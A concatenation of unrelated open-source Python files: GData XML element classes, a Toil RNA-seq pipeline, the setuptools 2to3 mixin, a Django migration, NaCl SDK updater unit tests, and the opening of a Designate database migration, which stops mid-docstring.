  Handles administrative districts such as U.S. or U.K. counties that are
  not used for mail addressing purposes. Subregion is not intended for
  delivery addresses.
  """
  _qname = GDATA_TEMPLATE % 'subregion'
class Region(atom.core.XmlElement):
  """The gd:region element.

  A state, province, county (in Ireland), Land (in Germany),
  departement (in France), etc.
  """
  _qname = GDATA_TEMPLATE % 'region'
class Postcode(atom.core.XmlElement):
  """The gd:postcode element.

  Postal code. Usually country-wide, but sometimes specific to the
  city (e.g. "2" in "Dublin 2, Ireland" addresses).
  """
  _qname = GDATA_TEMPLATE % 'postcode'
class Country(atom.core.XmlElement):
  """The gd:country element.

  The name or code of the country.

  NOTE(review): this redefinition shadows the earlier Country class (which
  also declared a 'code' attribute); later references such as
  StructuredPostalAddress.country bind to this version.
  """
  _qname = GDATA_TEMPLATE % 'country'
class FormattedAddress(atom.core.XmlElement):
  """The gd:formattedAddress element.

  The full, unstructured postal address.
  """
  _qname = GDATA_TEMPLATE % 'formattedAddress'
class StructuredPostalAddress(atom.core.XmlElement):
  """The gd:structuredPostalAddress element.

  Postal address split into components. It allows to store the address
  in locale independent format. The fields can be interpreted and used
  to generate formatted, locale dependent address. The following elements
  represent parts of the address: agent, house name, street, P.O. box,
  neighborhood, city, subregion, region, postal code, country. The
  subregion element is not used for postal addresses, it is provided for
  extended uses of addresses only. In order to store postal address in an
  unstructured form formatted address field is provided.
  """
  _qname = GDATA_TEMPLATE % 'structuredPostalAddress'
  # XML attributes.
  rel = 'rel'
  mail_class = 'mailClass'
  usage = 'usage'
  label = 'label'
  primary = 'primary'
  # Component child elements (see docstring above).
  agent = Agent
  house_name = HouseName
  street = Street
  po_box = PoBox
  neighborhood = Neighborhood
  city = City
  subregion = Subregion
  region = Region
  postcode = Postcode
  country = Country
  formatted_address = FormattedAddress
class Where(atom.core.XmlElement):
  """The gd:where element.

  A place (such as an event location) associated with the containing
  entity. The type of the association is determined by the rel attribute;
  the details of the location are contained in an embedded or linked-to
  Contact entry.

  A <gd:where> element is more general than a <gd:geoPt> element. The
  former identifies a place using a text description and/or a Contact
  entry, while the latter identifies a place using a specific geographic
  location.
  """
  _qname = GDATA_TEMPLATE % 'where'
  label = 'label'
  rel = 'rel'
  # Maps to the valueString XML attribute (text description of the place).
  value = 'valueString'
  # Embedded or linked-to Contact entry with the location details.
  entry_link = EntryLink
class AttendeeType(atom.core.XmlElement):
  """The gd:attendeeType element."""
  _qname = GDATA_TEMPLATE % 'attendeeType'
  # Holds one of the attendee-type rel constants defined above.
  value = 'value'
class AttendeeStatus(atom.core.XmlElement):
  """The gd:attendeeStatus element."""
  _qname = GDATA_TEMPLATE % 'attendeeStatus'
  # Holds one of the ATTENDEE_* status constants defined above.
  value = 'value'
class EventStatus(atom.core.XmlElement):
  """The gd:eventStatus element."""
  _qname = GDATA_TEMPLATE % 'eventStatus'
  # Holds one of the *_EVENT_STATUS constants defined above.
  value = 'value'
class Visibility(atom.core.XmlElement):
  """The gd:visibility element."""
  _qname = GDATA_TEMPLATE % 'visibility'
  # Holds one of the *_EVENT_VISIBILITY constants defined above.
  value = 'value'
class Who(atom.core.XmlElement):
  """The gd:who element.

  A person associated with the containing entity. The type of the
  association is determined by the rel attribute; the details about the
  person are contained in an embedded or linked-to Contact entry.

  The <gd:who> element can be used to specify email senders and
  recipients, calendar event organizers, and so on.
  """
  _qname = GDATA_TEMPLATE % 'who'
  email = 'email'
  rel = 'rel'
  # Maps to the valueString XML attribute (display name of the person).
  value = 'valueString'
  attendee_status = AttendeeStatus
  attendee_type = AttendeeType
  entry_link = EntryLink
class Deleted(atom.core.XmlElement):
  """gd:deleted when present, indicates the containing entry is deleted."""
  # NOTE(review): these two classes use GD_TEMPLATE while the rest of the
  # module uses GDATA_TEMPLATE -- presumably equivalent namespace templates;
  # confirm against the module header.
  _qname = GD_TEMPLATE % 'deleted'
class Money(atom.core.XmlElement):
  """Describes money"""
  _qname = GD_TEMPLATE % 'money'
  # Numeric amount attribute.
  amount = 'amount'
  # Maps to the currencyCode XML attribute (e.g. an ISO currency code --
  # presumably; not shown here).
  currency_code = 'currencyCode'
class MediaSource(object):
  """Bundles a media file reference with the metadata needed to send it.

  GData Entries can refer to media sources; instances keep the open file
  handle together with its MIME type, size in bytes and base file name.
  """

  def __init__(self, file_handle=None, content_type=None, content_length=None,
               file_path=None, file_name=None):
    """Creates an object of type MediaSource.

    Args:
      file_handle: A file handle pointing to the file to be encapsulated
          in the MediaSource.
      content_type: string The MIME type of the file. Required if a
          file_handle is given.
      content_length: int The size of the file. Required if a file_handle
          is given.
      file_path: string (optional) A full path name to the file. Used in
          place of a file_handle.
      file_name: string The name of the file without any path information.
          Required if a file_handle is given.
    """
    self.file_handle = file_handle
    self.content_type = content_type
    self.content_length = content_length
    self.file_name = file_name
    # A path plus a content type is enough to open the file ourselves and
    # derive the remaining metadata.
    path_given_instead_of_handle = (file_handle is None
                                    and content_type is not None
                                    and file_path is not None)
    if path_given_instead_of_handle:
      self.set_file_handle(file_path, content_type)

  def set_file_handle(self, file_name, content_type):
    """Opens the named file and records its type, size and base name.

    Args:
      file_name: string The path and file name to the file containing the
          media.
      content_type: string A MIME type representing the type of the media.
    """
    self.file_handle = open(file_name, 'rb')
    self.content_type = content_type
    self.content_length = os.path.getsize(file_name)
    self.file_name = os.path.basename(file_name)

  SetFileHandle = set_file_handle

  def modify_request(self, http_request):
    """Attaches this media source as a body part of http_request."""
    http_request.add_body_part(self.file_handle, self.content_type,
                               self.content_length)
    return http_request

  ModifyRequest = modify_request
| mit |
dgaston/ddb-ngsflow-scripts | defunct/workflow-KSHV_RNA-Seq_HiSat_StringTie.py | 3 | 2892 | #!/usr/bin/env python
# Standard packages
import os
import sys
import argparse
# Third-party packages
from toil.job import Job
# Package methods
from ddb import configuration
from ddb_ngsflow import pipeline
from ddb_ngsflow.rna import hisat
from ddb_ngsflow.rna import stringtie
if __name__ == "__main__":
    # Command line: sample sheet, pipeline configuration, plus the standard
    # Toil workflow options (job store, restart, etc.).
    parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--samples_file', help="Input configuration file for samples")
    parser.add_argument('-c', '--configuration', help="Configuration file for various settings")
    Job.Runner.addToilOptions(parser)
    args = parser.parse_args()
    args.logLevel = "INFO"

    sys.stdout.write("Parsing configuration data\n")
    config = configuration.configure_runtime(args.configuration)

    sys.stdout.write("Parsing sample data\n")
    samples = configuration.configure_samples(args.samples_file, config)

    # Workflow Graph definition. The following workflow definition should create a valid Directed Acyclic Graph (DAG)
    root_job = Job.wrapJobFn(pipeline.spawn_batch_jobs, cores=1)

    # GTFs produced by the per-sample StringTie runs, later merged together.
    transcripts_list = list()
    # Tool flags passed through to the hisat/stringtie wrappers.
    flags = ["keep_retained", "max_intron", "stranded"]

    # Per sample jobs: align with HISAT, then assemble transcripts with an
    # initial StringTie pass.
    for sample in samples:
        # Alignment and Refinement Stages
        align_job = Job.wrapJobFn(hisat.hisat_unpaired, config, sample, samples, flags,
                                  cores=int(config['hisat']['num_cores']),
                                  memory="{}G".format(config['hisat']['max_mem']))
        # Record the BAM name the alignment job will produce so downstream
        # jobs can find it.
        samples[sample]['bam'] = "{}.hisat.sorted.bam".format(sample)

        initial_st_job = Job.wrapJobFn(stringtie.stringtie_first, config, sample, samples, flags,
                                       cores=int(config['stringtie']['num_cores']),
                                       memory="{}G".format(config['stringtie']['max_mem']))
        transcripts_list.append("{}.stringtie_first.gtf".format(sample))

        # Create workflow from created jobs
        root_job.addChild(align_job)
        align_job.addChild(initial_st_job)

    transcripts_list_string = " ".join(transcripts_list)

    # Merge all per-sample transcript assemblies into one reference GTF;
    # addFollowOn ensures this runs only after every child job above.
    merge_job = Job.wrapJobFn(stringtie.stringtie_merge, config, samples, flags, transcripts_list_string,
                              cores=int(config['stringtie']['num_cores']),
                              memory="{}G".format(config['stringtie']['max_mem']))
    root_job.addFollowOn(merge_job)
    config['merged_transcript_reference'] = "{}.stringtie.merged.gtf".format(config['run_id'])

    # Final per-sample StringTie quantification against the merged reference.
    for sample in samples:
        stringtie_job = Job.wrapJobFn(stringtie.stringtie, config, sample, samples, flags,
                                      cores=int(config['stringtie']['num_cores']),
                                      memory="{}G".format(config['stringtie']['max_mem']))
        merge_job.addChild(stringtie_job)

    # Start workflow execution
    Job.Runner.startToil(root_job, args)
| mit |
alexzoo/python | selenium_tests/env/lib/python3.6/site-packages/setuptools/lib2to3_ex.py | 418 | 2013 | """
Customized Mixin2to3 support:
- adds support for converting doctests
This module raises an ImportError on Python 2.
"""
from distutils.util import Mixin2to3 as _Mixin2to3
from distutils import log
from lib2to3.refactor import RefactoringTool, get_fixers_from_package
import setuptools
class DistutilsRefactoringTool(RefactoringTool):
    """RefactoringTool that routes lib2to3's logging through distutils.log."""

    def log_error(self, msg, *args, **kw):
        # NOTE(review): **kw (e.g. exc_info) is dropped here — distutils.log
        # has no equivalent; presumably intentional, verify if errors need
        # tracebacks.
        log.error(msg, *args)

    def log_message(self, msg, *args):
        log.info(msg, *args)

    def log_debug(self, msg, *args):
        log.debug(msg, *args)
class Mixin2to3(_Mixin2to3):
    """Distutils' Mixin2to3 extended to honor setuptools' 2to3 options
    (use_2to3, use_2to3_fixers, use_2to3_exclude_fixers) and to optionally
    convert doctests as well as source files.
    """

    def run_2to3(self, files, doctests=False):
        """Run 2to3 over *files*; convert doctests instead when doctests=True."""
        # See if the distribution option has been set, otherwise check the
        # setuptools default.
        if self.distribution.use_2to3 is not True:
            return
        if not files:
            return
        log.info("Fixing " + " ".join(files))
        self.__build_fixer_names()
        self.__exclude_fixers()
        if doctests:
            # Doctest conversion is additionally gated on a global
            # setuptools switch.
            if setuptools.run_2to3_on_doctests:
                r = DistutilsRefactoringTool(self.fixer_names)
                r.refactor(files, write=True, doctests_only=True)
        else:
            _Mixin2to3.run_2to3(self, files)

    def __build_fixer_names(self):
        # Lazily compute self.fixer_names once: the standard fixer packages
        # plus any extras declared by the distribution.
        if self.fixer_names:
            return
        self.fixer_names = []
        for p in setuptools.lib2to3_fixer_packages:
            self.fixer_names.extend(get_fixers_from_package(p))
        if self.distribution.use_2to3_fixers is not None:
            for p in self.distribution.use_2to3_fixers:
                self.fixer_names.extend(get_fixers_from_package(p))

    def __exclude_fixers(self):
        # Drop fixers named on the instance or the distribution from the
        # list built above.
        excluded_fixers = getattr(self, 'exclude_fixers', [])
        if self.distribution.use_2to3_exclude_fixers is not None:
            excluded_fixers.extend(self.distribution.use_2to3_exclude_fixers)
        for fixer_name in excluded_fixers:
            if fixer_name in self.fixer_names:
                self.fixer_names.remove(fixer_name)
| apache-2.0 |
rsubra13/dtc | twitterclone/migrations/0011_auto_20150331_1958.py | 1 | 1815 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Creates the Photo and Post models. Each Photo carries Flickr metadata
    and references the Post it belongs to."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('twitterclone', '0010_auto_20150331_1958'),
    ]

    operations = [
        migrations.CreateModel(
            name='Photo',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True)),
                # Flickr API fields — presumably used to reconstruct the
                # image URL (farm/server/secret/id); verify against the
                # view code that renders photos.
                ('url', models.URLField(max_length=255, blank=True)),
                ('server', models.CharField(max_length=255, blank=True)),
                ('farm', models.CharField(max_length=255, blank=True)),
                ('secret', models.CharField(max_length=255, blank=True)),
                ('flickrid', models.CharField(max_length=255, blank=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True)),
                ('title', models.CharField(unique=True, max_length=200)),
                ('message', models.TextField(max_length=1024)),
                ('created_date', models.DateTimeField()),
                ('photo_id', models.CharField(max_length=50)),
                ('tags', models.CharField(max_length=200)),
                ('userId', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        # Added after both models exist so the FK target is defined.
        migrations.AddField(
            model_name='photo',
            name='post',
            field=models.ForeignKey(to='twitterclone.Post'),
            preserve_default=True,
        ),
    ]
| apache-2.0 |
DirtyUnicorns/android_external_chromium_org | native_client_sdk/src/build_tools/tests/sdktools_commands_test.py | 76 | 18779 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
import re
import tarfile
import tempfile
import unittest
from sdktools_test import SdkToolsTestCase
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
BUILD_TOOLS_DIR = os.path.dirname(SCRIPT_DIR)
TOOLS_DIR = os.path.join(os.path.dirname(BUILD_TOOLS_DIR), 'tools')
sys.path.extend([BUILD_TOOLS_DIR, TOOLS_DIR])
import manifest_util
import oshelpers
class TestCommands(SdkToolsTestCase):
def setUp(self):
    # Delegate fixture creation (manifest, local server, temp dirs) to the
    # SdkToolsTestCase base class.
    self.SetupDefault()
def _AddDummyBundle(self, manifest, bundle_name):
    """Create a throwaway bundle with one archive and add it to *manifest*.

    The bundle gets fixed metadata (revision 1337, version 23, beta,
    not recommended) so tests can assert against known values.

    Returns:
        The bundle as stored in the manifest (not the local instance).
    """
    bundle = manifest_util.Bundle(bundle_name)
    bundle.revision = 1337
    bundle.version = 23
    bundle.description = bundle_name
    bundle.stability = 'beta'
    bundle.recommended = 'no'
    bundle.repath = bundle_name
    archive = self._MakeDummyArchive(bundle_name)
    bundle.AddArchive(archive)
    manifest.SetBundle(bundle)
    # Need to get the bundle from the manifest -- it doesn't use the one we
    # gave it.
    return manifest.GetBundle(bundle_name)
def _MakeDummyArchive(self, bundle_name, tarname=None, filename='dummy.txt'):
    """Build a small .tar.bz2 archive in the test server's directory.

    The archive contains a single file with known content, so tests can
    verify extraction. The scratch directory used to stage the file is
    always removed.

    Args:
        bundle_name: Name of the bundle; used for content and paths.
        tarname: Optional base name for the tarball (defaults to
            bundle_name).
        filename: Name of the file placed inside the archive.

    Returns:
        A manifest_util.Archive describing the tarball (url, size,
        checksum) for the host OS.
    """
    tarname = (tarname or bundle_name) + '.tar.bz2'
    temp_dir = tempfile.mkdtemp(prefix='archive')
    try:
        dummy_path = os.path.join(temp_dir, filename)
        with open(dummy_path, 'w') as stream:
            stream.write('Dummy stuff for %s' % bundle_name)

        # Build the tarfile directly into the server's directory.
        tar_path = os.path.join(self.basedir, tarname)
        # Use the context manager instead of manual try/finally close.
        with tarfile.open(tar_path, 'w:bz2') as tarstream:
            tarstream.add(dummy_path, os.path.join(bundle_name, filename))

        with open(tar_path, 'rb') as archive_stream:
            sha1, size = manifest_util.DownloadAndComputeHash(archive_stream)

        archive = manifest_util.Archive(manifest_util.GetHostOS())
        archive.url = self.server.GetURL(os.path.basename(tar_path))
        archive.size = size
        archive.checksum = sha1
        return archive
    finally:
        # Always clean up the staging dir, even if archive creation failed.
        oshelpers.Remove(['-rf', temp_dir])
def testInfoBasic(self):
    """The info command should display information about the given bundle."""
    self._WriteManifest()
    output = self._Run(['info', 'sdk_tools'])
    # Make sure basic information is there.
    bundle = self.manifest.GetBundle('sdk_tools')
    archive = bundle.GetHostOSArchive()  # was: trailing semicolon
    # assertIn gives a useful failure message (shows both operands),
    # unlike assertTrue(x in y).
    self.assertIn(bundle.name, output)
    self.assertIn(bundle.description, output)
    self.assertIn(str(bundle.revision), output)
    self.assertIn(str(archive.size), output)
    self.assertIn(archive.checksum, output)
    self.assertIn(bundle.stability, output)
def testInfoUnknownBundle(self):
"""The info command should notify the user of unknown bundles."""
self._WriteManifest()
bogus_bundle = 'foobar'
output = self._Run(['info', bogus_bundle])
self.assertTrue(re.search(r'[uU]nknown', output))
self.assertTrue(bogus_bundle in output)
def testInfoMultipleBundles(self):
"""The info command should support listing multiple bundles."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._AddDummyBundle(self.manifest, 'pepper_24')
self._WriteManifest()
output = self._Run(['info', 'pepper_23', 'pepper_24'])
self.assertTrue('pepper_23' in output)
self.assertTrue('pepper_24' in output)
self.assertFalse(re.search(r'[uU]nknown', output))
def testInfoMultipleArchives(self):
"""The info command should display multiple archives."""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
archive2 = self._MakeDummyArchive('pepper_26', tarname='pepper_26_more',
filename='dummy2.txt')
archive2.host_os = 'all'
bundle.AddArchive(archive2)
self._WriteManifest()
output = self._Run(['info', 'pepper_26'])
self.assertTrue('pepper_26' in output)
self.assertTrue('pepper_26_more' in output)
def testListBasic(self):
    """The list command should display basic information about remote
    bundles."""
    self._WriteManifest()
    output = self._Run(['list'])
    self.assertTrue(re.search('I.*?sdk_tools.*?stable', output, re.MULTILINE))
    # This line is important (it's used by the updater to determine if the
    # sdk_tools bundle needs to be updated), so let's be explicit.
    # BUG FIX: the original asserted the bare string literal, which is
    # always truthy and therefore never checked the output at all.
    self.assertIn('All installed bundles are up-to-date.', output)
def testListMultiple(self):
"""The list command should display multiple bundles."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['list'])
# Added pepper_23 to the remote manifest not the local manifest, so it
# shouldn't be installed.
self.assertTrue(re.search('^[^I]*pepper_23', output, re.MULTILINE))
self.assertTrue('sdk_tools' in output)
def testListWithRevision(self):
"""The list command should display the revision, if desired."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['list', '-r'])
self.assertTrue(re.search('pepper_23.*?r1337', output))
def testListWithUpdatedRevision(self):
"""The list command should display when there is an update available."""
p23bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteCacheManifest(self.manifest)
# Modify the remote manifest to have a newer revision.
p23bundle.revision += 1
self._WriteManifest()
output = self._Run(['list', '-r'])
# We should see a display like this: I* pepper_23 (r1337 -> r1338)
# The star indicates the bundle has an update.
self.assertTrue(re.search('I\*\s+pepper_23.*?r1337.*?r1338', output))
def testListLocalVersionNotOnRemote(self):
"""The list command should tell the user if they have a bundle installed
that doesn't exist in the remote manifest."""
self._WriteManifest()
p23bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteCacheManifest(self.manifest)
output = self._Run(['list', '-r'])
message = 'Bundles installed locally that are not available remotely:'
message_loc = output.find(message)
self.assertNotEqual(message_loc, -1)
# Make sure pepper_23 is listed after the message above.
self.assertTrue('pepper_23' in output[message_loc:])
def testSources(self):
"""The sources command should allow adding/listing/removing of sources.
When a source is added, it will provide an additional set of bundles."""
other_manifest = manifest_util.SDKManifest()
self._AddDummyBundle(other_manifest, 'naclmono_23')
with open(os.path.join(self.basedir, 'source.json'), 'w') as stream:
stream.write(other_manifest.GetDataAsString())
source_json_url = self.server.GetURL('source.json')
self._WriteManifest()
output = self._Run(['sources', '--list'])
self.assertTrue('No external sources installed.' in output)
output = self._Run(['sources', '--add', source_json_url])
output = self._Run(['sources', '--list'])
self.assertTrue(source_json_url in output)
# Should be able to get info about that bundle.
output = self._Run(['info', 'naclmono_23'])
self.assertTrue('Unknown bundle' not in output)
self._Run(['sources', '--remove', source_json_url])
output = self._Run(['sources', '--list'])
self.assertTrue('No external sources installed.' in output)
def testUpdateBasic(self):
"""The update command should install the contents of a bundle to the SDK."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
def testUpdateInCacheButDirectoryRemoved(self):
"""The update command should update if the bundle directory does not exist,
even if the bundle is already in the cache manifest."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteCacheManifest(self.manifest)
self._WriteManifest()
self._Run(['update', 'pepper_23'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
def testUpdateNoNewVersion(self):
"""The update command should do nothing if the bundle is already up-to-date.
"""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
output = self._Run(['update', 'pepper_23'])
self.assertTrue('is already up-to-date.' in output)
def testUpdateWithNewVersion(self):
"""The update command should update to a new version if it exists."""
bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
bundle.revision += 1
self._WriteManifest()
output = self._Run(['update', 'pepper_23'])
self.assertTrue('already exists, but has an update available' in output)
# Now update using --force.
output = self._Run(['update', 'pepper_23', '--force'])
self.assertTrue('Updating bundle' in output)
cache_manifest = self._ReadCacheManifest()
num_archives = len(cache_manifest.GetBundle('pepper_23').GetArchives())
self.assertEqual(num_archives, 1)
def testUpdateUnknownBundles(self):
"""The update command should ignore unknown bundles and notify the user."""
self._WriteManifest()
output = self._Run(['update', 'foobar'])
self.assertTrue('unknown bundle' in output)
def testUpdateRecommended(self):
"""The update command should update only recommended bundles when run
without args.
"""
bundle_25 = self._AddDummyBundle(self.manifest, 'pepper_25')
bundle_25.recommended = 'no'
bundle_26 = self._AddDummyBundle(self.manifest, 'pepper_26')
bundle_26.recommended = 'yes'
self._WriteManifest()
output = self._Run(['update'])
# Should not try to update sdk_tools (even though it is recommended)
self.assertTrue('Ignoring manual update request.' not in output)
self.assertFalse(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_25')))
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_26', 'dummy.txt')))
def testUpdateCanary(self):
"""The update command should create the correct directory name for repath'd
bundles.
"""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
bundle.name = 'pepper_canary'
self._WriteManifest()
output = self._Run(['update', 'pepper_canary'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_canary', 'dummy.txt')))
def testUpdateMultiArchive(self):
"""The update command should include download/untar multiple archives
specified in the bundle.
"""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
archive2 = self._MakeDummyArchive('pepper_26', tarname='pepper_26_more',
filename='dummy2.txt')
archive2.host_os = 'all'
bundle.AddArchive(archive2)
self._WriteManifest()
output = self._Run(['update', 'pepper_26'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_26', 'dummy.txt')))
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_26', 'dummy2.txt')))
def testUpdateBadSize(self):
    """If an archive has a bad size, print an error."""
    bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
    archive = bundle.GetHostOSArchive()  # was: trailing semicolon
    archive.size = -1
    self._WriteManifest()
    stdout = self._Run(['update', 'pepper_26'], expect_error=True)
    self.assertIn('Size mismatch', stdout)
def testUpdateBadSHA(self):
    """If an archive has a bad SHA, print an error."""
    bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
    archive = bundle.GetHostOSArchive()  # was: trailing semicolon
    # Any value that can't match the real digest triggers the mismatch path.
    archive.checksum = 0
    self._WriteManifest()
    stdout = self._Run(['update', 'pepper_26'], expect_error=True)
    self.assertIn('SHA1 checksum mismatch', stdout)
def testUninstall(self):
"""The uninstall command should remove the installed bundle, if it
exists.
"""
# First install the bundle.
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['update', 'pepper_23'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
# Now remove it.
self._Run(['uninstall', 'pepper_23'])
self.assertFalse(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23')))
# The bundle should not be marked as installed.
output = self._Run(['list'])
self.assertTrue(re.search('^[^I]*pepper_23', output, re.MULTILINE))
def testReinstall(self):
"""The reinstall command should remove, then install, the specified
bundles.
"""
# First install the bundle.
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['update', 'pepper_23'])
dummy_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
# Change some files.
foo_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'foo.txt')
with open(foo_txt, 'w') as f:
f.write('Another dummy file. This one is not part of the bundle.')
with open(dummy_txt, 'w') as f:
f.write('changed dummy.txt')
# Reinstall the bundle.
self._Run(['reinstall', 'pepper_23'])
self.assertFalse(os.path.exists(foo_txt))
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
cache_manifest = self._ReadCacheManifest()
num_archives = len(cache_manifest.GetBundle('pepper_23').GetArchives())
self.assertEqual(num_archives, 1)
def testReinstallWithDuplicatedArchives(self):
"""The reinstall command should only use the most recent archive if there
are duplicated archives.
NOTE: There was a bug where the sdk_cache/naclsdk_manifest2.json file was
duplicating archives from different revisions. Make sure that reinstall
ignores old archives in the bundle.
"""
# First install the bundle.
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
manifest = self._ReadCacheManifest()
bundle = manifest.GetBundle('pepper_23')
self.assertEqual(len(bundle.GetArchives()), 1)
# Now add a bogus duplicate archive
archive2 = self._MakeDummyArchive('pepper_23', tarname='pepper_23',
filename='dummy2.txt')
bundle.AddArchive(archive2)
self._WriteCacheManifest(manifest)
output = self._Run(['reinstall', 'pepper_23'])
# When updating just one file, there is no (file 1/2 - "...") output.
self.assertFalse('file 1/' in output)
# Should be using the last archive.
self.assertFalse(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy2.txt')))
def testReinstallDoesntUpdate(self):
"""The reinstall command should not update a bundle that has an update."""
# First install the bundle.
bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
dummy_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
# Update the revision.
bundle.revision += 1
self._WriteManifest()
# Change the file.
foo_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'foo.txt')
with open(dummy_txt, 'w') as f:
f.write('changed dummy.txt')
# Reinstall.
self._Run(['reinstall', 'pepper_23'])
# The data has been reinstalled.
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
# ... but the version hasn't been updated.
output = self._Run(['list', '-r'])
self.assertTrue(re.search('I\*\s+pepper_23.*?r1337.*?r1338', output))
def testArchiveCacheBasic(self):
"""Downloaded archives should be stored in the cache by default."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
archive_cache = os.path.join(self.cache_dir, 'archives')
cache_contents = os.listdir(archive_cache)
self.assertEqual(cache_contents, ['pepper_23'])
cache_contents = os.listdir(os.path.join(archive_cache, 'pepper_23'))
self.assertEqual(cache_contents, ['pepper_23.tar.bz2'])
def testArchiveCacheEviction(self):
archive_cache = os.path.join(self.cache_dir, 'archives')
self._AddDummyBundle(self.manifest, 'pepper_23')
self._AddDummyBundle(self.manifest, 'pepper_22')
self._WriteManifest()
# First install pepper_23
self._Run(['update', 'pepper_23'])
archive = os.path.join(archive_cache, 'pepper_23', 'pepper_23.tar.bz2')
archive_size = os.path.getsize(archive)
# Set the mtime on the pepper_23 bundle to be a few seconds in the past.
# This is needed so that the two bundles don't end up with the same
# timestamp which can happen on systems that don't report sub-second
# timestamps.
atime = os.path.getatime(archive)
mtime = os.path.getmtime(archive)
os.utime(archive, (atime, mtime-10))
# Set cache limit to size of pepper archive * 1.5
self._WriteConfig('{ "cache_max": %d }' % int(archive_size * 1.5))
# Now install pepper_22, which should cause pepper_23 to be evicted
self._Run(['update', 'pepper_22'])
cache_contents = os.listdir(archive_cache)
self.assertEqual(cache_contents, ['pepper_22'])
def testArchiveCacheZero(self):
    """Archives should not be cached when cache_max is zero."""
    # BUG FIX: the original called _AddDummyBundle twice for the same
    # bundle; the second call simply rebuilt and replaced the first, so
    # one call suffices.
    self._WriteConfig('{ "cache_max": 0 }')
    self._AddDummyBundle(self.manifest, 'pepper_23')
    self._WriteManifest()
    self._Run(['update', 'pepper_23'])
    archive_cache = os.path.join(self.cache_dir, 'archives')
    # Archive folder should be completely removed by cache cleanup.
    self.assertFalse(os.path.exists(archive_cache))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
cneill/designate-testing | designate/storage/impl_sqlalchemy/migrate_repo/versions/043_modify_domains_and_records.py | 8 | 3587 | # Copyright (c) 2014 eBay Inc.
#
# Author: Ron Rickard <rrickard@ebaysf.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import MetaData, Table, Enum, Column, Integer
from migrate.changeset.constraint import UniqueConstraint
meta = MetaData()
ACTIONS = ['CREATE', 'DELETE', 'UPDATE', 'NONE']
def upgrade(migrate_engine):
    """Widen the domains/records status enums to a shared resource_statuses
    type (adding 'ERROR'), and add 'action' columns plus a records 'serial'
    column. Postgres needs raw ALTER TYPE statements; other dialects go
